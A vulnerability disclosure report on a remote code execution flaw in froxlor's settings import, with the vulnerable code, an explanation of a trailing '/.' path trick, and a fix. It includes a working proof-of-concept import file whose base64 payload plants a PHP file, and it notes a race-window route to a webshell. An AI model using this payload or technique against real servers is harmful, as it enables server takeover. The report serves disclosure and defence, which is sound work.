Remote Code Execution Vulnerability Through Unrestricted File Write in froxlor/froxlor
Reported on
Mar 4th 2023
Description
In the settings import function, in the file Froxlor\lib\Froxlor\SImExporter.php:
// $img_filename and $img_data both come from the imported settings file:
// the "<key>.image_data" value is the (base64-encoded) file content,
// the "<key>" value is the destination path.
file_put_contents($img_filename, $img_data);
if (function_exists('finfo_open')) {
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mimetype = finfo_file($finfo, $img_filename);
    finfo_close($finfo);
} else {
    $mimetype = mime_content_type($img_filename);
}
if (empty($mimetype)) {
    $mimetype = 'application/octet-stream';
}
if (!in_array($mimetype, ['image/jpeg', 'image/jpg', 'image/png', 'image/gif'])) {
    // the file is already on disk; the @ operator hides any unlink() failure
    @unlink($img_filename);
    throw new Exception("Uploaded file is not a valid image");
}
$spl = explode('.', $img_filename);
$file_extension = strtolower(array_pop($spl));
unset($spl);
if (!in_array($file_extension, [
    'jpeg',
    'jpg',
    'png',
    'gif'
])) {
    @unlink($img_filename);
    throw new Exception("Invalid file-extension, use one of: jpeg, jpg, png, gif");
}
The code first writes the user-supplied data to the user-supplied path and only then checks the MIME type and the file extension. If either check fails, it tries to delete the file again with unlink().
Unfortunately, there is a small trick between file_put_contents() and unlink(). If we set the file path to /img/a.php/., file_put_contents() saves the data to /img/a.php, but unlink() called on the same string cannot delete /img/a.php (the trailing "/." requires a.php to be a directory, which it is not), and the @ operator silences the failure. For this path the extension check is guaranteed to fail, because the text after the last "." is empty, so the unlink() branch is always reached; either way the file stays on disk.
Proof of Concept
Here is our proof of concept:
{
    "panel.version": "2.0.13",
    "panel.db_version": "202302030",
    "_sha": "bd48ad3bab8de5e10cd3e7882c19dd9457145d3d",
    "a.b.image_data": "R0lGODlhCjw/cGhwIHBocGluZm8oKTs=",
    "a.b": "/img/a.php/."
}
If we import this file in the settings panel, the decoded payload (a GIF89a header followed by <?php phpinfo();) is written to img/a.php on the web server. The GIF89a header is what makes finfo identify the data as image/gif, so the MIME check does not stop it.
attack video: https://drive.google.com/file/d/19ScE3oZ_G1VBk124QU35--cbQZ9T1Z4e/view?usp=sharing
It is also worth noting that the vulnerability remains exploitable even without the unlink() trick. Because the code writes the file first and deletes it only after a check fails, there is a time window between file_put_contents() and unlink() during which the webshell can be requested; a handful of concurrent requests (multi-threading) is enough to hit that window. Hope this gets noticed when it's fixed.
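A hardened version of the import routine, added here as an illustration and not froxlor's own code (the function name, the $imageDir parameter and the random file name are assumptions), addresses both problems described above: it validates the decoded bytes in memory before anything touches the disk, so there is no write-then-unlink window to race, and it never uses a user-supplied path, so the /img/a.php/. trick has nothing to act on:

```php
<?php
declare(strict_types=1);

// Added example, not froxlor's code: validate the imported image entirely
// in memory and only then write it, to a path the server chooses.

/**
 * Persist an imported image setting safely.
 *
 * @param string $base64Data  the "<key>.image_data" value from the import file
 * @param string $imageDir    directory chosen by the server for images (assumed)
 * @return string             path of the file that was written
 * @throws Exception          on any validation failure, before anything is written
 */
function saveImportedImage(string $base64Data, string $imageDir): string
{
    // Strict decoding: anything outside the base64 alphabet is rejected.
    $imgData = base64_decode($base64Data, true);
    if ($imgData === false || $imgData === '') {
        throw new Exception("Image data is not valid base64");
    }

    // Sniff the MIME type on the bytes, not on a file that is already on disk.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mimetype = finfo_buffer($finfo, $imgData);
    finfo_close($finfo);

    // The extension is derived from the detected type; the user supplies none.
    $allowed = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];
    if ($mimetype === false || !isset($allowed[$mimetype])) {
        throw new Exception("Uploaded file is not a valid image");
    }

    // The directory is fixed by the server; resolve it and make sure it exists.
    $dir = realpath($imageDir);
    if ($dir === false || !is_dir($dir)) {
        throw new Exception("Image directory does not exist");
    }

    // Random, server-generated file name: no user-controlled path component at all,
    // so neither "/img/a.php/." nor any other crafted path can reach this point.
    $target = $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $allowed[$mimetype];

    // 'x' mode fails if the file already exists, so nothing is silently overwritten.
    $fh = @fopen($target, 'x');
    if ($fh === false) {
        throw new Exception("Could not create image file");
    }
    fwrite($fh, $imgData);
    fclose($fh);

    return $target;
}

// Usage (the directory is an assumption for this example):
// $path = saveImportedImage($import['a.b.image_data'], '/var/www/froxlor/img');
```

Note that finfo still classifies the proof-of-concept payload as image/gif because of its GIF89a prefix; a magic-byte check cannot reject a polyglot, which is why the decisive change is that the attacker no longer picks the file name, extension or directory. As defence in depth, the image directory should additionally be served with PHP execution disabled, so that even a file with an unexpected extension cannot run.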
Impact
This vulnerability can be exploited to achieve remote code execution on the target web server.
Occurrences
References
If possible, can the vulnerability go public as early as possible? I really need the CVE, please!
